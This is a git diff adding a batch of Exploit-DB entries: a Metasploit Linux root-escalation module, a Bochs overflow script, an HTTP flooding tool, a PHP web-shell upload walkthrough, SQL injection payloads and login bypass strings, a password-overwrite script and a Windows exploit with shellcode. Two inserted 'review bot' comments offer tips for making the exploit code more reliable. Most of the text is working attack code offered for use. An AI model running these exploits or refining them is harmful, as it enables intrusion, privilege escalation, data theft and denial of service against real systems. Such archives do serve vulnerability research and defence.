diff --git a/exploits/hardware/webapps/43981.txt b/exploits/hardware/webapps/43981.txt new file mode 100644 index 000000000..b221e6216 --- /dev/null +++ b/exploits/hardware/webapps/43981.txt @@ -0,0 +1,44 @@ +# Exploit Title: Netis-WF2419 HTML Injection +# Date: 20/01/2018 +# Exploit Author: Sajibe Kanti +# Author Contact :https://twitter.com/@sajibekantibd +# Vendor Homepage: http://www.netis-systems.com/ +# Version: Netis-WF2419 , V3.2.41381 +# Tested on: Windows 10 + +# CEV : CVE-2018-6190 + + + HTML Injection in Netis-WF2419 + + + +Netis-WF2419 is prone to an HTML-injection vulnerability because it fails +to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or script code could run in the context of the +affected site, potentially allowing the attacker to steal cookie-based +authentication credentials and control how the site is rendered to the +user; other attacks are also possible. + +Netis-WF2419 is vulnerable; + +Proof of Concept: + +1. Go to your wireless router ip (ex. 192.168.0.1) + +2. Go to Wireless Settings - tab + +3. Now Click MAC Filtering -tab + +4.Write MAC Address and in -Description- write (

XSS-PWD

) + +5.Click Add + +6. Now You Can See HTML Injection + + + +#Solution: + + Upgrade Firmware \ No newline at end of file diff --git a/exploits/linux/local/43971.rb b/exploits/linux/local/43971.rb new file mode 100755 index 000000000..27881b641 --- /dev/null +++ b/exploits/linux/local/43971.rb 
@@ -0,0 +1,185 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apport / ABRT chroot Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on Linux systems by
+ invoking the default coredump handler inside a namespace ("container").
+
+ Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
+ vulnerable, due to a feature which allows forwarding reports to
+ a container's Apport by changing the root directory before loading
+ the crash report, causing 'usr/share/apport/apport' within the crashed
+ task's directory to be executed.
+
+ Similarly, Fedora is vulnerable when the kernel crash handler is
+ configured to change root directory before executing ABRT, causing
+ 'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be
+ executed.
+
+ In both instances, the crash handler does not drop privileges,
+ resulting in code execution as root.
+
+ This module has been tested successfully on Apport 2.14.1 on
+ Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Stéphane Graber', # Independent discovery, PoC and patch
+ 'Tavis Ormandy', # Independent discovery and C exploit
+ 'Ricardo F. 
Teixeira', # shell exploit
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'DisclosureDate' => 'Mar 31 2015',
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'References' =>
+ [
+ [ 'CVE', '2015-1318' ],
+ [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
+ # Exploits
+ [ 'EDB', '36782' ],
+ [ 'EDB', '36746' ],
+ [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],
+ # ABRT (Fedora)
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
+ [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
+ # Apport (Ubuntu)
+ [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],
+ [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],
+ [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],
+ [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]
+ ]
+ ))
+ register_options(
+ [
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ])
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def check
+ kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first
+
+ if kernel_version < Gem::Version.new('3.12')
+ vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable"
+ return CheckCode::Safe
+ end
+
+ vprint_good "Linux kernel version #{kernel_version} is vulnerable"
+
+ kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern'
+
+ # Vulnerable core_pattern (abrt):
+ # kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+ # Patched systems no longer preface the command with /usr/sbin/chroot
+ # kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+ if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')
+ vprint_good 'System is configured to chroot ABRT for crash reporting'
+ 
return CheckCode::Vulnerable
+ end
+
+ # Vulnerable core_pattern (apport):
+ # kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P
+ if kernel_core_pattern.include? 'apport'
+ vprint_good 'System is configured to use Apport for crash reporting'
+
+ res = cmd_exec 'apport-cli --version'
+
+ if res.blank?
+ vprint_error 'Apport is NOT installed'
+ return CheckCode::Safe
+ end
+
+ apport_version = Gem::Version.new(res.split('-').first)
+
+ if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')
+ vprint_good "Apport version #{apport_version} is vulnerable"
+ return CheckCode::Vulnerable
+ end
+
+ vprint_error "Apport version #{apport_version} is NOT vulnerable"
+
+ return CheckCode::Safe
+ end
+
+ vprint_error 'System is NOT configured to use Apport or chroot ABRT for crash reporting'
+
+ CheckCode::Safe
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ cmd_exec "chmod +x '#{path}'"
+ register_file_for_cleanup path
+ end
+
+ def exploit
+ if check != CheckCode::Vulnerable
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ # Upload Tavis Ormandy's newpid exploit:
+ # - https://www.exploit-db.com/exploits/36746/
+ # Cross-compiled with:
+ # - i486-linux-musl-cc -static newpid.c
+ path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
+ fd = ::File.open path, 'rb'
+ executable_data = fd.read fd.stat.size
+ fd.close
+
+ executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ executable_path = "#{base_dir}/#{executable_name}"
+ upload_and_chmodx executable_path, executable_data
+
+ # Upload payload executable
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{base_dir}/#{payload_name}"
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # newpid writes an 'exploit' directory
+ # which must be removed manually if exploitation fails
+ 
register_dir_for_cleanup "#{base_dir}/exploit"
+
+ # Change working directory to base_dir,
+ # allowing newpid to create the required hard links
+ cmd_exec "cd '#{base_dir}'"
+
+ print_status 'Launching exploit...'
+ output = cmd_exec executable_path
+ output.each_line { |line| vprint_status line.chomp }
+
+ # Check for root privileges
+ id = cmd_exec 'id'
+
+ unless id.include? 'root'
+ fail_with Failure::Unknown, 'Failed to gain root privileges'
+ end
+
+ print_good 'Upgraded session to root privileges'
+ vprint_line id
+
+ # Execute payload executable
+ vprint_status 'Executing payload...'
+ cmd_exec payload_path
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/43979.py
new file mode 100755
index 000000000..1744d1198
--- /dev/null
+++ b/exploits/linux/local/43979.py
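Review bot: In `exploit`, the bundled newpid binary is read with `fd = ::File.open path, 'rb'` / `fd.read fd.stat.size` / `fd.close`, so the descriptor is leaked if the read raises; `executable_data = ::File.binread path` reads the whole file and closes it on every path. A missing data file currently escapes as a raw `Errno::ENOENT` from `::File.open` instead of a module failure; reporting it with `fail_with Failure::BadConfig, "#{path} not found"` keeps error handling consistent with the `fail_with` calls elsewhere in this method. Separately, the post-run check `unless id.include? 'root'` is a substring test on the output of `id`, which any user or group name containing "root" satisfies; matching `id =~ /uid=0\(/` pins the condition the success message actually claims.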
@@ -0,0 +1,116 @@ +# Exploit Author: Juan Sacco - http://exploitpack.com +# Vulnerability found using Exploit Pack v10 - Fuzzer module +# +# An attacker could exploit this vulnerability to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Program description: +# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that +# runs on most popular platforms. It includes emulation of the Intel x86 CPU, +# common I/O devices, and a custom BIOS. +# +# Homepage: http://bochs.sourceforge.net/ +# Version: 2.6-5 +# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb + +import os, subprocess +from struct import pack + +# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'` +# +# Program received signal SIGSEGV, Segmentation fault. +# +# [----------------------------------registers-----------------------------------] +# EAX: 0x1 +# EBX: 0x41414141 ('AAAA') +# ECX: 0x8167fa0 +(<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov +edx,DWORD PTR [esp+0x8]) +# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90 +(<_ZN13bx_real_sim_cD2Ev>: repz ret) +# ESI: 0x41414141 ('AAAA') +# EDI: 0x41414141 ('AAAA') +# EBP: 0x41414141 ('AAAA') +# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/") +# EIP: 0x41424344 ('DCBA') +# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT +direction overflow) +# [-------------------------------------code-------------------------------------] +# Invalid $PC address: 0x41424344 +# [------------------------------------stack-------------------------------------] +# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/") +# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2 +# 0008| 0xbfffedc8 --> 0x0 +# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10) +# 0016| 0xbfffedd0 --> 0x2 +# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0 +# 0024| 0xbfffedd8 --> 0x0 +# 0028| 0xbfffeddc --> 0xb6eee286 
(<__libc_start_main+246>: add esp,0x10) +# [------------------------------------------------------------------------------] +# Legend: code, data, rodata, value +# Stopped reason: SIGSEGV +# 0x41424344 in ?? () + +# Padding goes here +junk = 'A'*1200 +ropchain = pack('\'') + parser.add_argument('-p', help='Specify POST request. Usage: -p \'\'') + parser.add_argument('-d', help='Specify data payload for POST request', default=None) + parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*') + parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int) + args = parser.parse_args() + + global url, payload, additionalHeaders + additionalHeaders = args.ah + payload = args.d + + if args.g: + url = args.g + for i in range(args.t): + t = SendGETThread() + t.start() + + if args.p: + url = args.p + for i in range(args.t): + t = SendPOSTThread() + t.start() + + if len(sys.argv)==1: + parser.print_help() + exit() + +if __name__ == "__main__": + main(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/php/webapps/43963.txt b/exploits/php/webapps/43963.txt new file mode 100644 index 000000000..f9296fc5d --- /dev/null +++ b/exploits/php/webapps/43963.txt 
@@ -0,0 +1,37 @@ +Affected Code: + +public static function _uploadFile() { + +- if ( ! wCMS::$loggedIn && ! isset($_FILES['uploadFile']) && ! isset($_REQUEST['token'])) return; + private static function uploadFileAction() +- if (isset($_REQUEST['token']) && $_REQUEST['token'] == wCMS::_generateToken() && isset($_FILES['uploadFile'])) { + + +Proof of Concept +Steps to Reproduce: + +1. Login with a valid credentials +2. Select Files option from the Settings menu of Content +3. Upload a file with php extension containing the below code: + + + +4. Click on Upload +5. Once the file is uploaded Click on the uploaded file and add ?cmd= to +the URL followed by a system command such as whoami,time,date etc. +Example: +http://localhost:8081/wondercms/files/shell.php?cmd=dir + +Recommended Patch: + +Create a whitelist of allowed filetypes. + +The patch that addresses this bug is available here: + +https://github.com/robiso/WonderCMS-testRepo/commit/8bd6cf9f3bf6a1d0123eb8b646584a63ee323c8a?diff=split + +At line 742 \ No newline at end of file diff --git a/exploits/php/webapps/43964.txt b/exploits/php/webapps/43964.txt new file mode 100644 index 000000000..93c724727 --- /dev/null +++ b/exploits/php/webapps/43964.txt 
@@ -0,0 +1,28 @@ +# Exploit Title: Wonder CMS 2.3.1 Host Header Injection +# Date: 30-01-2018 +# Exploit Author: Samrat Das +# Contact: http://twitter.com/Samrat_Das93 +# Website: https://securitywarrior9.blogspot.in/ +# Vendor Homepage: https://www.wondercms.com/ +# Version: 2.3.1 +# CVE : CVE-2017-14523 +# Category: Webapp CMS + +1. Description + +The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning + + + +2. Proof of Concept + +Intercept any web request of cms using a proxy tool. +Change the http host header to: +POST / HTTP/1.1 +Host: google.com + +You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/ + +3. Solution: + +To Mitigate host header injections allows only a whitelist of allowed hostnames. \ No newline at end of file diff --git a/exploits/php/webapps/43965.txt b/exploits/php/webapps/43965.txt new file mode 100644 index 000000000..772cf7371 --- /dev/null +++ b/exploits/php/webapps/43965.txt @@ -0,0 +1,17 @@ +# Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection +# Dork: N/A +# Date: 2018-02-03 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://www.phpscriptsmall.com/product/matrimonial-website-script/ +# Version: 2.1.6 +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands. +# # # # # +# Proof of Concept: + + + http://localhost/entrepreneur/view-profile.php?uid=[SQL] \ No newline at end of file diff --git a/exploits/php/webapps/43966.txt b/exploits/php/webapps/43966.txt new file mode 100644 index 000000000..b273f992c --- /dev/null +++ b/exploits/php/webapps/43966.txt 
@@ -0,0 +1,42 @@ +# # +# Exploit Title: NixCMS 1.0 - 'category_id' SQL Ýnjection +# Dork: N/A +# Date: 03.02.2018 +# Vendor: https://www.nixdesign.de +# Software Link: https://www.nixdesign.de/nix-cms/ +# Demo: http://www.jamaram.de/ +# Version: 1.0 +# Tested on: WiN10_X64 +# Exploit Author: Bora Bozdogan +# Author WebSite : http://borabozdogan.net.tr +# Author E-mail : borayazilim45@mit.tc +# Author Skype : borayazilim45 +# # +# POC: +# +# http://localhost/[PATH]/single.php?category_id=[SQL] +# +# Parameter: category_id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# +# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 15 columns +# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF +# +# # + +available databases [3]: +[*] information_schema +[*] usr_web24_1 +[*] web24_4 \ No newline at end of file diff --git a/exploits/php/webapps/43967.py b/exploits/php/webapps/43967.py new file mode 100755 index 000000000..eef24938b --- /dev/null +++ b/exploits/php/webapps/43967.py 
@@ -0,0 +1,70 @@ +# Exploit Title: Online Voting System - Authentication Bypass +# Date: 02.02.2018 +# Vendor Homepage: http://themashabrand.com +# Software Link: http://themashabrand.com/p/votin +# Demo: http://localhost/Onlinevoting +# Version: 1.0 +# Category: Webapps +# Exploit Author: Giulio Comi +# CVE : CVE-2018-6180 + + +#Description + +A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for accounts registered in the application. + +The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier and without requiring the current valid password for target account. + +# Proof of Concept: + +#!/usr/bin/env python +import requests +from time import sleep +from lxml import html + + +def own(auth_bypass_request): + """ + Reset the password of a user just knowing his id + """ + url_edit_password = "admin/profile.php" + + payload = { + 'id': 1, + 'admin': 'admin', # overwrite the username of the victim + 'password': "ARBITRARY_PASSWORD", # overwrite the password of the victim + 'edit': '' + } + + response = auth_bypass_request.post(target_site + url_edit_password, data=payload) + + # Parse response to check if the request was successful + check_result = html.fromstring(response).xpath('//div[@class="alert alert-success"]//p//strong/text()') + + return(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]() + + +def login(login_request): + """ + Enjoy the new password chosen for the victim + """ + credentials = {'username': 'admin', + 'password': "ARBITRARY_PASSWORD", + 'usertype': 'admin', + 'login': '' + } + + response = login_request.post(target_site, data=credentials) + + print(response.text) + + +if __name__ == "__main__": + + target_site = "http://localhost/Onlinevoting/" + request = requests.Session() + if own(request): + sleep(4) # just a bit of delay + login(request) + else: + 
print('Maybe the given id is not registered in the application') \ No newline at end of file diff --git a/exploits/php/webapps/43974.txt b/exploits/php/webapps/43974.txt new file mode 100644 index 000000000..e5692a424 --- /dev/null +++ b/exploits/php/webapps/43974.txt @@ -0,0 +1,61 @@ + + + + + + + +
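Review bot: `own` returns its result through `(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]()`, an indexed tuple of lambdas that hides a plain membership test; `return 'Successfully' in str(check_result)` says the same thing directly. Both `own` and `login` also read `target_site`, a name bound only inside the `__main__` guard, so neither function can be imported or exercised on its own; passing it as a parameter (`def own(session, target_site)`) or defining it at module level removes the hidden global. The `lxml` import is a third-party dependency the header block does not list next to `requests`; a one-line note there would help the reader.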
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43975.html b/exploits/php/webapps/43975.html new file mode 100644 index 000000000..34512c2f7 --- /dev/null +++ b/exploits/php/webapps/43975.html @@ -0,0 +1,40 @@ + + + + + + + +
+ + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43976.txt b/exploits/php/webapps/43976.txt new file mode 100644 index 000000000..f7af1bf10 --- /dev/null +++ b/exploits/php/webapps/43976.txt @@ -0,0 +1,61 @@ + + + + + + + +
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + +
+ + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/43977.php b/exploits/php/webapps/43977.php new file mode 100644 index 000000000..52c09d7cb --- /dev/null +++ b/exploits/php/webapps/43977.php @@ -0,0 +1,40 @@ +"; +foreach($l as $u){ + echo "[-] ID\n\n\n\n:\n" .$u['id']."
"; + echo "[-] Name\n\n:\n" .$u['name']."
"; + echo "[-] Email\n:\n" .$u['email']."
"; + echo "
"; +}echo "*-----------------------------*";} +else{echo "[-] No user";} +?> \ No newline at end of file diff --git a/exploits/php/webapps/43978.txt b/exploits/php/webapps/43978.txt new file mode 100644 index 000000000..08c2ac660 --- /dev/null +++ b/exploits/php/webapps/43978.txt 
@@ -0,0 +1,91 @@ +# # # # # +# Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection +# Dork: N/A +# Date: 04.02.2018 +# Vendor Homepage: http://joomlaserviceprovider.com/ +# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/ +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: CVE-2018-6609 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# Want To Donate ? +# BTC : 1NGEp2eNWRCE6gp2i31UPN6G6KBzMDdCyZ +# ETH : 0xd606c6b86a1b88c7fcc1f58f7659cfd968449cf2 +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=[SQL] +# +# -66' /*!07777UNION*/ /*!07777SELECT*/ nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,nUlL,/*!07777CONCAT*/((/*!07777SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!07777FROM*/+INFORMATION_SCHEMA.TABLES+/*!07777WHERE*/+TABLE_SCHEMA=DATABASE())),nUlL,nUlL,nUlL,nUlL--+VerAyari +# +# Parameter: ticketcode (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND 5298=5298 AND 'okLe'='okLe +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x717a6a7871,(SELECT (ELT(8072=8072,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FwvD'='FwvD +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: 
option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=5a71d319e86c1' AND SLEEP(5) AND 'Ozir'='Ozir +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 29 columns +# Payload: option=com_jsptickets&controller=ticketlist&task=edit&ticketcode=-4507' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a6a7871,0x72476c507a64564861484f575645536355695958564f4c4e6858625061774a6b59796b6571746249,0x717a706a71),NULL,NULL,NULL,NULL-- fcOG + +# 2) +# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=statuslist&task=edit&id=[SQL] +# +# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND 6325=6325 +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND (SELECT 4097 FROM(SELECT COUNT(*),CONCAT(0x71716a7a71,(SELECT (ELT(4097=4097,1))),0x717a707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: option=com_jsptickets&controller=statuslist&task=edit&id=4 AND SLEEP(5) +# +# 3) +# http://localhost/[PATH]/index.php?option=com_jsptickets&controller=prioritylist&task=edit&id=[SQL] +# +# 66 AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Parameter: id (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: 
option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND 9454=9454 +# +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 AND (SELECT 1045 FROM(SELECT COUNT(*),CONCAT(0x7170716a71,(SELECT (ELT(1045=1045,1))),0x716b6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 OR time-based blind +# Payload: option=com_jsptickets&controller=prioritylist&task=edit&id=1 OR SLEEP(5) +# +# 4) +# +#
+# +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43980.txt b/exploits/php/webapps/43980.txt new file mode 100644 index 000000000..8f6403bc5 --- /dev/null +++ b/exploits/php/webapps/43980.txt @@ -0,0 +1,19 @@ +# Exploit title: Student Profile Management System Script 2.0.6 - Admin +Panel Authentication Bypass +# Dork: "Powered by: i-Net Solution" +# Date: 2018-02-06 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://www.phpscriptsmall.com/product/studentstaff-profile-management-system/ +# Version: 2.0.6 +# Category: Webapps +# CVE: N/A +# # # # # +# Description: +# With this exploit,Attacker can bypass admin panel Authentication. +# # # # # +# Proof of Concept: + +# username : anything +# password : admin' or 'a'='a +# admin panel login : /admin_login.php \ No newline at end of file diff --git a/exploits/windows/dos/42341.c b/exploits/windows/dos/42341.c new file mode 100644 index 000000000..6daac8996 --- /dev/null +++ b/exploits/windows/dos/42341.c 
@@ -0,0 +1,121 @@
+#define _WINSOCK_DEPRECATED_NO_WARNINGS
+#define DEFAULT_BUFLEN 512
+
+#include
+#include
+#include
+#include
+
+DWORD SendRequest(char *request, int request_size) {
+ WSADATA wsa;
+ SOCKET s;
+ struct sockaddr_in server;
+ char recvbuf[DEFAULT_BUFLEN];
+ int recvbuflen = DEFAULT_BUFLEN;
+ int iResult;
+
+ printf("\n[>] Initialising Winsock...\n");
+ if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
+ {
+ printf("[!] Failed. Error Code : %d", WSAGetLastError());
+ return 1;
+ }
+
+ printf("[>] Initialised.\n");
+ if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
+ {
+ printf("[!] Could not create socket : %d", WSAGetLastError());
+ }
+
+ printf("[>] Socket created.\n");
+ server.sin_addr.s_addr = inet_addr("172.16.116.222");
+ server.sin_family = AF_INET;
+ server.sin_port = htons(8080);
+
+ if (connect(s, (struct sockaddr *)&server, sizeof(server)) < 0)
+ {
+ puts("[!] Connect error");
+ return 1;
+ }
+ puts("[>] Connected");
+
+ if (send(s, request, request_size, 0) < 0)
+ {
+ puts("[!] 
Send failed"); + return 1; + } + puts("\n[>] Request sent\n"); + closesocket(s); + return 0; +} + +void EvilRequest() { + + char request_one[] = "POST /login HTTP/1.1\r\n" + "Host: 172.16.116.222\r\n" + "User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" + "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" + "Accept-Language: en-US,en;q=0.5\r\n" + "Referer: http://172.16.116.222/login\r\n" + "Connection: close\r\n" + "Content-Type: application/x-www-form-urlencoded\r\n" + "Content-Length: "; + char request_two[] = "\r\n\r\nusername="; + + char *padding = malloc(780); + memset(padding, 0x41, 780); + memset(padding + 778, 0x00, 2); + unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll + + unsigned char shellcode[] = + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP SLIDE + "\xdb\xda\xbd\x92\xbc\xaf\xa7\xd9\x74\x24\xf4\x58\x31\xc9\xb1" + "\x52\x31\x68\x17\x83\xc0\x04\x03\xfa\xaf\x4d\x52\x06\x27\x13" + "\x9d\xf6\xb8\x74\x17\x13\x89\xb4\x43\x50\xba\x04\x07\x34\x37" + "\xee\x45\xac\xcc\x82\x41\xc3\x65\x28\xb4\xea\x76\x01\x84\x6d" + "\xf5\x58\xd9\x4d\xc4\x92\x2c\x8c\x01\xce\xdd\xdc\xda\x84\x70" + "\xf0\x6f\xd0\x48\x7b\x23\xf4\xc8\x98\xf4\xf7\xf9\x0f\x8e\xa1" + "\xd9\xae\x43\xda\x53\xa8\x80\xe7\x2a\x43\x72\x93\xac\x85\x4a" + "\x5c\x02\xe8\x62\xaf\x5a\x2d\x44\x50\x29\x47\xb6\xed\x2a\x9c" + "\xc4\x29\xbe\x06\x6e\xb9\x18\xe2\x8e\x6e\xfe\x61\x9c\xdb\x74" + "\x2d\x81\xda\x59\x46\xbd\x57\x5c\x88\x37\x23\x7b\x0c\x13\xf7" + "\xe2\x15\xf9\x56\x1a\x45\xa2\x07\xbe\x0e\x4f\x53\xb3\x4d\x18" + "\x90\xfe\x6d\xd8\xbe\x89\x1e\xea\x61\x22\x88\x46\xe9\xec\x4f" + "\xa8\xc0\x49\xdf\x57\xeb\xa9\xf6\x93\xbf\xf9\x60\x35\xc0\x91" + "\x70\xba\x15\x35\x20\x14\xc6\xf6\x90\xd4\xb6\x9e\xfa\xda\xe9" + "\xbf\x05\x31\x82\x2a\xfc\xd2\x01\xba\x8a\xef\x32\xb9\x72\xe1" + 